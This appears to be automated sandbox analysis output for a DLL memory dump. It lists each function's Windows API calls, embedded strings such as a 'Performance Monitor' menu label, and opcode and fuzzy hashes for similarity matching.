Function 6E4B5D90, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91threadclipboardCOMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E4B5E04
SwitchToThread.KERNEL32(00000000,?,?,?,?,?,?), ref: 6E4B5E74
GetOpenClipboardWindow.USER32(00000000,?,?,?), ref: 6E4B5E93
GetACP.KERNEL32(00000000,?,?,?), ref: 6E4B5EA4

Strings

e, xrefs: 6E4B5DAF

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ClipboardOpenSwitchThreadUnothrow_t@std@@@Window__ehfuncinfo$??2@
String ID: e
API String ID: 1567280528-4024072794
Opcode ID: 0c48fca8010fe926671e7669cae04c5866d9ea2c2c6755691fc654321ac65ba4
Instruction ID: 7cc222c5c0ab3a0278012bdd9595327f78e2021c3ccd36ce4769ae1755c9c95b
Opcode Fuzzy Hash: 0c48fca8010fe926671e7669cae04c5866d9ea2c2c6755691fc654321ac65ba4
Instruction Fuzzy Hash: 0131D4319147058FC302DF7A944491AF7EAAFDE385F148B2EF441F3151EB34A899CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C1C00, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39windowCOMMON

Download Yara Rule

APIs

InsertMenuW.USER32(?,?,00000C00,?,00000000), ref: 6E4C1C2A
InsertMenuW.USER32(?,?,00000400,?,Performance Monitor - (Reload Configuration)), ref: 6E4C1C3E
InsertMenuW.USER32(?,?,00000400,?,Performance Monitor - (Edit Configuration)), ref: 6E4C1C52

Strings

Performance Monitor - (Edit Configuration), xrefs: 6E4C1C40
Performance Monitor - (Reload Configuration), xrefs: 6E4C1C2C

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: InsertMenu
String ID: Performance Monitor - (Edit Configuration)$Performance Monitor - (Reload Configuration)
API String ID: 1478380399-4081388356
Opcode ID: fd64612af3ee9eaa136708ecffc7de0e0240d725e279809cee489acb7d9fd4dd
Instruction ID: 82db010a983bf158c86cbc0ac688285e6d29c571c857dfee9f380b816d0fdc68
Opcode Fuzzy Hash: fd64612af3ee9eaa136708ecffc7de0e0240d725e279809cee489acb7d9fd4dd
Instruction Fuzzy Hash: E1F0B43325025DBBEB01DE959C80FBB7B6DEB8CB10F044017FB149A181C371A9229BB4

Uniqueness

Uniqueness Score: -1.00%

Function 6E4DED2F, Relevance: 7.7, APIs: 5, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50e3fd18376e899175cae0d0e3de09989845ab6b538eddcb77e999e999c8d39f
Instruction ID: 191d756521bb8d21d49b4b9478c780fa827b1e11633776b5607bc61e3ced0bc1
Opcode Fuzzy Hash: 50e3fd18376e899175cae0d0e3de09989845ab6b538eddcb77e999e999c8d39f
Instruction Fuzzy Hash: E1719031D20217AFDB119EF5C8E4EAEFB79EF41350B14062FE42457284DB70994ACBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E4DB9B3, Relevance: 7.7, APIs: 5, Instructions: 187COMMON

Download Yara Rule

APIs

Part of subcall function 6E4D9BD2: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6E4C8F9C,00000105,000000FF,FFFFFFFF,00000000,?,6E4B1687,?,00000103,000000FF), ref: 6E4D9C04

_free.LIBCMT ref: 6E4DBABE
_free.LIBCMT ref: 6E4DBAD5
_free.LIBCMT ref: 6E4DBAF4
_free.LIBCMT ref: 6E4DBB0F
_free.LIBCMT ref: 6E4DBB26

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 6b4fcd1409748fd5f6fcb60cfc9fd6ba2a6f174908be3bcb320a42559c3dbdfd
Instruction ID: 4a72c9dad6909f48fba6479ce72945bee031fc7d12aacd0688187bbc58f9fe53
Opcode Fuzzy Hash: 6b4fcd1409748fd5f6fcb60cfc9fd6ba2a6f174908be3bcb320a42559c3dbdfd
Instruction Fuzzy Hash: E651BF31A00705AFDB10DFB9C860EAA77F8EF49724B40456EE909DB758E771D909CB80

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C4260, Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

PdhRemoveCounter.PDH(?,49F8414E,?,?,00000000,6E4E9E9B,000000FF,?,6E4C15EF,00000000), ref: 6E4C42B3
PdhCloseQuery.PDH(?,49F8414E,?,?,00000000,6E4E9E9B,000000FF,?,6E4C15EF,00000000), ref: 6E4C42DE
PdhOpenQueryW.PDH(00000000,00000000,?), ref: 6E4C4302
PdhValidatePathW.PDH(?), ref: 6E4C435E
PdhAddCounterW.PDH(?,?,00000000,?), ref: 6E4C438A

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: CounterQuery$CloseOpenPathRemoveValidate
String ID:
API String ID: 698537007-0
Opcode ID: 659836bedaa6f0e482639fa5dda7a1a1aed063c429a66a9653f9bed779cfa3cc
Instruction ID: 4d050971d5cd6973050906e4b9c1bc822838115c06923ad374a35e17404e6952
Opcode Fuzzy Hash: 659836bedaa6f0e482639fa5dda7a1a1aed063c429a66a9653f9bed779cfa3cc
Instruction Fuzzy Hash: D8510375900259AFDB20CF64CD44FDAB3B8FF44744F10819AE558AB250D774AAC2CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 6E4D70FB, Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E4D716D
_free.LIBCMT ref: 6E4D718D

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: dd096ce54f5f395a2aaf822f62051fcd7314aa9f657bc2ffb644203b9a9924f8
Instruction ID: aa8338b34dc097d14781cf1b71b68df17a9a401fd0388751a800dd9c61bb32e8
Opcode Fuzzy Hash: dd096ce54f5f395a2aaf822f62051fcd7314aa9f657bc2ffb644203b9a9924f8
Instruction Fuzzy Hash: 3E410632A042009FDB14DFB8C8A4E9DB7F5EF85718F1146AED915EB381DB31A905CB81

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B4C40, Relevance: 7.6, APIs: 5, Instructions: 124COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6E4B4C7C
std::_Lockit::_Lockit.LIBCPMT ref: 6E4B4C9E
std::_Lockit::~_Lockit.LIBCPMT ref: 6E4B4CBE
std::_Facet_Register.LIBCPMT ref: 6E4B4D8F
std::_Lockit::~_Lockit.LIBCPMT ref: 6E4B4DAF

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 680210b4547f3577e4ba2cb71f35722f1c0053f6e98912e8c66c16b60ca20bf3
Instruction ID: 3bf2cdfbe54e5494db4793390338356580c2d3686570931b98f4369ddaab6508
Opcode Fuzzy Hash: 680210b4547f3577e4ba2cb71f35722f1c0053f6e98912e8c66c16b60ca20bf3
Instruction Fuzzy Hash: 1551BD709142158FCB11CFE8C540F9EB7B8EF45B98F11455EE806AB380EB74AA46CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B4AE0, Relevance: 7.6, APIs: 5, Instructions: 113COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6E4B4B16
std::_Lockit::_Lockit.LIBCPMT ref: 6E4B4B36
std::_Lockit::~_Lockit.LIBCPMT ref: 6E4B4B56
std::_Facet_Register.LIBCPMT ref: 6E4B4BF3
std::_Lockit::~_Lockit.LIBCPMT ref: 6E4B4C13

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 576a2df60622d15e78aad1aee1acbe9d3498e5030de784acba81300e2747b178
Instruction ID: 0d1704c883db67aa317f58a677db0a284490324dd4b39542924304c5b920feac
Opcode Fuzzy Hash: 576a2df60622d15e78aad1aee1acbe9d3498e5030de784acba81300e2747b178
Instruction Fuzzy Hash: 8B41B2719082158FCB11CFE4C580F9EB7B4EB44B58F11455FD906AB341EB75A906CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 6E4DDD03, Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 6E4DDD0C
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6E4DDD2F

Part of subcall function 6E4D9BD2: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6E4C8F9C,00000105,000000FF,FFFFFFFF,00000000,?,6E4B1687,?,00000103,000000FF), ref: 6E4D9C04

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6E4DDD55
_free.LIBCMT ref: 6E4DDD68
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E4DDD77

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 7ccf21db3c44c4df23971330c07d9871f1a4db8541b2e6aad0c4419111699860
Instruction ID: fee04bfae6e054e616b7312a90d715079ed783329323d94cfc5ec6573b0993e7
Opcode Fuzzy Hash: 7ccf21db3c44c4df23971330c07d9871f1a4db8541b2e6aad0c4419111699860
Instruction Fuzzy Hash: B0018872601B1A7F2B2115FA5C6CE7B696DEEC3EA4311026EF914C3245DB619C058DB0

Uniqueness

Uniqueness Score: -1.00%

Function 6E4DA3E2, Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(000000FF,6E4D6995,?,6E4D642D,6E4D9BBE,6E4D6995,?,6E4D731A,000000FF,000000FF), ref: 6E4DA3E7
SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E4D731A,000000FF,000000FF), ref: 6E4DA40D
_free.LIBCMT ref: 6E4DA44D
_free.LIBCMT ref: 6E4DA480
SetLastError.KERNEL32(00000000,000000FF), ref: 6E4DA48D

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 5786d971fd808bd114bfe812c1a45fb544eadb1f6453b3b554b09c13cd1ff919
Instruction ID: 6a618d19a2465ab0c7b9b8ec360a2eb100ca1040e63e5757b367f6125762dcc0
Opcode Fuzzy Hash: 5786d971fd808bd114bfe812c1a45fb544eadb1f6453b3b554b09c13cd1ff919
Instruction Fuzzy Hash: 5611E932240A016BD65226F6BDB8E6A275DAFC3668724061BF529923C5EF31D90D6160

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C8508, Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000008,00000000,6E4C3342), ref: 6E4C850D
HeapAlloc.KERNEL32(00000000), ref: 6E4C8514
GetProcessHeap.KERNEL32(00000000,00000000), ref: 6E4C855A
HeapFree.KERNEL32(00000000), ref: 6E4C8561

Part of subcall function 6E4C83A7: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,6E4C8550,00000000), ref: 6E4C83CB
Part of subcall function 6E4C83A7: HeapAlloc.KERNEL32(00000000), ref: 6E4C83D2

Strings

;\Ln, xrefs: 6E4C8541

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$Alloc$Free
String ID: ;\Ln
API String ID: 1864747095-2500737854
Opcode ID: 1d1449b290b1cdad65a51007edf0d4227c5f570630ea3483b29066c0618f079e
Instruction ID: c738d13c77ea56dce5d434040f7ffb416eb644c18bd36eed8b221e25d2431b33
Opcode Fuzzy Hash: 1d1449b290b1cdad65a51007edf0d4227c5f570630ea3483b29066c0618f079e
Instruction Fuzzy Hash: ABF0B47A544B125BCB652BF8B80CD5B6A69AFC6FA1701442EF545C7248DF70E4028792

Uniqueness

Uniqueness Score: -1.00%

Function 6E4E4978, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E4E4990

Part of subcall function 6E4D9B98: HeapFree.KERNEL32(00000000,00000000,?,6E4D731A,000000FF,000000FF), ref: 6E4D9BAE
Part of subcall function 6E4D9B98: GetLastError.KERNEL32(6E4D6995,?,6E4D731A,000000FF,000000FF), ref: 6E4D9BC0

_free.LIBCMT ref: 6E4E49A2
_free.LIBCMT ref: 6E4E49B4
_free.LIBCMT ref: 6E4E49C6
_free.LIBCMT ref: 6E4E49D8

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: fc9002d02bf4d3f75aef57f951a7c5408850a5af16551be8314a0ce14083bd14
Instruction ID: 0a1c9e766d3f812b273c5ba7b426df089d7fd68fe060f104620e12fccde92578
Opcode Fuzzy Hash: fc9002d02bf4d3f75aef57f951a7c5408850a5af16551be8314a0ce14083bd14
Instruction Fuzzy Hash: 17F06231411B09AB8A60EAF4F4A0C8733DDBA417517A14C0FF15AE7A00C731F891C6E4

Uniqueness

Uniqueness Score: -1.00%

Function 6E4D6AD4, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Windows\SYSTEM32\loaddll32.exe, xrefs: 6E4D6B17, 6E4D6B1E, 6E4D6B52

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Windows\SYSTEM32\loaddll32.exe
API String ID: 0-1872383224
Opcode ID: 340f63ee3369796568b372427b1f3974afaa6975e46a506d62c2bbb267e2710c
Instruction ID: e470e57d6c8a15d1d39c382b96d2925b7434c662f62ee58046df01ed8bbe4c17
Opcode Fuzzy Hash: 340f63ee3369796568b372427b1f3974afaa6975e46a506d62c2bbb267e2710c
Instruction Fuzzy Hash: 9641A471A20615AFCB11DFE9C9A0DDEBBFCEB85714B10009BE404D7300D7B19A49CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B17B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6E4B17DD
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E4B182C

Part of subcall function 6E4C60DA: _Yarn.LIBCPMT ref: 6E4C60F9
Part of subcall function 6E4C60DA: _Yarn.LIBCPMT ref: 6E4C611D

__CxxThrowException@8.LIBVCRUNTIME ref: 6E4B185E

Strings

bad locale name, xrefs: 6E4B1848

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
String ID: bad locale name
API String ID: 3628047217-1405518554
Opcode ID: 881dab041e3bbeb12669585d2245f9f733c947e7b4346baf9fdf1d24b9446772
Instruction ID: 6bd069388c6171f02ba272b8da1021ae960e9c546aca6bc9ba05e5d717061796
Opcode Fuzzy Hash: 881dab041e3bbeb12669585d2245f9f733c947e7b4346baf9fdf1d24b9446772
Instruction Fuzzy Hash: 6E117C71814784DED720CFB9C804B8BBBF8EB19A14F008A5EE459D7B81D775A508CB95

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C7FF4, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000000D,?,6E4C7876,00000001,00000004,6E4B224A,00000000,?,6E4B1D57,6E5014C0,6E4B5700,6E5014C4,?,6E4B224A,00000004,00000001), ref: 6E4C8078

Strings

;\Ln, xrefs: 6E4C8014, 6E4C805E
ios_base::failbit set, xrefs: 6E4C7FF7

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast
String ID: ;\Ln$ios_base::failbit set
API String ID: 1452528299-315570376
Opcode ID: ca902cba45bb4682a5152c04115b1efdd2b8cb57e3b42acb3988e1797d55e9e4
Instruction ID: 14606556618f8b12f3d424fd80a8fdcf08d853ac632752e1f76c1652f66d04c1
Opcode Fuzzy Hash: ca902cba45bb4682a5152c04115b1efdd2b8cb57e3b42acb3988e1797d55e9e4
Instruction Fuzzy Hash: 6611AC3A24422AAFCF126FB6DC44D5EB765BF4DB60F02403AF91597211DB70A811CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C81F2, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 6E4B8BC0: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,6E4FD6E8), ref: 6E4B8BC5
Part of subcall function 6E4B8BC0: GetLastError.KERNEL32(?,00000000,00000000,?,6E4FD6E8), ref: 6E4B8BCF

IsDebuggerPresent.KERNEL32(?,?,?,6E4B11DF), ref: 6E4C8225
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,6E4B11DF), ref: 6E4C8234

Strings

Nn, xrefs: 6E4C8215
ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 6E4C822F

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
String ID: Nn$ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3511171328-2848728407
Opcode ID: 72f89cc82c9e9e904d9653c2fcbdc097db20473eb47ff1231c9d998f7b107c8d
Instruction ID: 926f72ffa8f24b26d36afb5af2939200856d9e7a58af01240d3454603cce94eb
Opcode Fuzzy Hash: 72f89cc82c9e9e904d9653c2fcbdc097db20473eb47ff1231c9d998f7b107c8d
Instruction Fuzzy Hash: A7E06D70504B018BD7709FF4D118B427BE4AB49749F008C2EE496C7B05EB70E0488BA2

Uniqueness

Uniqueness Score: -1.00%

Function 6E4DA5BB, Relevance: 6.3, APIs: 4, Instructions: 316COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 6E4DA642

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: cae96cd944f24bfe251b0d126a4b103d3cc5a52edf7e0cf0203c8768d0cc22b6
Instruction ID: 7239d12048a2a8a6fc54c5aadcf7f2ac161c7b976b79cfab3ab8bfd067b0dd7b
Opcode Fuzzy Hash: cae96cd944f24bfe251b0d126a4b103d3cc5a52edf7e0cf0203c8768d0cc22b6
Instruction Fuzzy Hash: 20B15972D452469FE701CFB8C860FAEBBB4EF05354F14426BE8509B381D338894AD791

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B5A30, Relevance: 6.1, APIs: 4, Instructions: 134clipboardwindowCOMMON

Download Yara Rule

APIs

GetOpenClipboardWindow.USER32(00000000,?,00000000,6E4B6431,0000002E,00000000,00000000,?,0000002E,00000000), ref: 6E4B5A3C
CloseClipboard.USER32 ref: 6E4B5A73
GetMenuCheckMarkDimensions.USER32 ref: 6E4B5B30
IsSystemResumeAutomatic.KERNEL32 ref: 6E4B5BA0

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Clipboard$AutomaticCheckCloseDimensionsMarkMenuOpenResumeSystemWindow
String ID:
API String ID: 2155751611-0
Opcode ID: 48ff5c27a146dce0b01913d80dc64f45cea00aa0bb6f9c93b0d42f4c56620cad
Instruction ID: d1f9251fba6a77c004ce313b94ea2f443768c0770f9df7a03b46cb49b64c41bf
Opcode Fuzzy Hash: 48ff5c27a146dce0b01913d80dc64f45cea00aa0bb6f9c93b0d42f4c56620cad
Instruction Fuzzy Hash: 0441D831914B424AC303DEB5D49091BF7EBBFEF680F549B1FE441B6252EB348885C6A2

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B8FB0, Relevance: 6.1, APIs: 4, Instructions: 121COMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32(?), ref: 6E4B8FE1

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: 68cfd888deb116980a8422af90b2981b4a6ec869c5c5a9c7cca465395c69d0a8
Instruction ID: 820863be63cfdd558d810d227d933c2b9c2be15c63c63589e886fb61abeb224f
Opcode Fuzzy Hash: 68cfd888deb116980a8422af90b2981b4a6ec869c5c5a9c7cca465395c69d0a8
Instruction Fuzzy Hash: 2231E632A083165B9B08CDBDE49596ABBE5EF553B0710826FEC15C7348EB32D950C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 6E4DF32A, Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(FFFFFFFF,00000000,?,00000002,00000000,00000000,00000000,00000000,?,FFFFFFFF,00000001,00000002,?,00000001,00000000,?), ref: 6E4DF377
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6E4DF400
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6E4DF412
__freea.LIBCMT ref: 6E4DF41B

Part of subcall function 6E4D9BD2: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6E4C8F9C,00000105,000000FF,FFFFFFFF,00000000,?,6E4B1687,?,00000103,000000FF), ref: 6E4D9C04

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
